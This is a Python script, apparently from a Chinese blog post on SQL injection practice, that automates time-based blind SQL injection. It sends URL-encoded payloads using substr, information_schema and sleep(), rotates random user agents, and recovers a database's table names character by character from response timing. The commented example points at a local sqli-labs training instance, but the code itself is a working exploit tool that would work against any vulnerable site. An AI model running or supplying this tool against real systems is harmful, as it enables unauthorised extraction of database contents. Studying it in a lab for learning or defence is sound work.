# -*- coding: utf-8 -*-
"""
@Time : 2022/4/4 16:20
@Auth : zhangxiang
@File :BlindInject_StrTable.py
@IDE :PyCharm
@Motto:ABC(Always Be Coding)
"""
from urllib import request
from urllib import parse
import re
import time
import sys
import random
from ua_info import ua_list
from GetTableLength_Str import GetTableLength_Str
class BlindInject_StrTable:
def __init__(self):
pass
def StartInject_StrTable(self,url,code,resultList,databasesName,numTable):
flag=0
#%20and%20if(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),1,1)=%27e%27,sleep(5),1)
for num in range(0, numTable+1):
url = url
judgeStr = "%20and%20if(substr((select%20group_concat(table_name)%20from%20information_schema.tables" \
"%20where%20table_schema=%27security%27),changeNum,1)=%27replaceStr%27,sleep(1),1)%23"
submitStr = "&submit=0x5375626D6974%23"
pattern1 = r"changeNum"
replace1 = str(num)
FisWord = re.sub(pattern1, replace1, judgeStr)
for x in code:
Str = x
word = FisWord + submitStr
# 正则
pattern2 = r"replaceStr"
replace2 = Str
SeWord = re.sub(pattern2, replace2, word)
full_url = url + SeWord
# print(full_url)
# 2.发请求保存到本地
headers = {'User-Agent':random.choice(ua_list)}
startTime = time.time()
req = request.Request(url=full_url, headers=headers)
res = request.urlopen(req)
endTime = time.time()
allTime = endTime - startTime
# print(allTime)
# print(flag)
if (resultList[flag] == "None"):
print("注入结束")
return resultList
if (allTime > 1):
print("*" * 200)
resultList.append(x)
print("得到盲注结果:" + str(resultList))
print("注入的payload:" + full_url)
print("使用的时间:" + str(allTime))
print("*" * 200)
flag = flag+1
else:
pass
return resultList
def getStr(self,resultList): # 将列表值转为字符串
resultList.pop(0)
list2 = [str(i) for i in resultList]
strList = ''.join(list2)
return strList
#
# if __name__ == '__main__':
# blindInject_StrTable = BlindInject_StrTable()
# getGetTableLength_Str = GetTableLength_Str()
#
# databasesName = "security"
# resultList = ["开始"]
# path = './code2.txt'
# url = "http://127.0.0.1/Sqli_Edited_Version-master/sqlilabs/Less-1/?id=1'"
# f = open(path, 'r', encoding='utf-8')
# code = f.read()
# print(resultList[0])
# print("注入中,请稍等:")
# numTable = getGetTableLength_Str.StartGetTableLength_Str(url, databasesName)
# print("该数据库中的表名长度为:" + str(numTable))
# resultList = blindInject_StrTable.StartInject_StrTable(url,code,resultList,databasesName,numTable)
# strList = blindInject_StrTable.getStr(resultList)
# print("该数据库中的表名有:"+strList)
SQL注入代码实践(盲注-获取表名长度【字符型】)
最新推荐文章于 2024-07-22 13:49:00 发布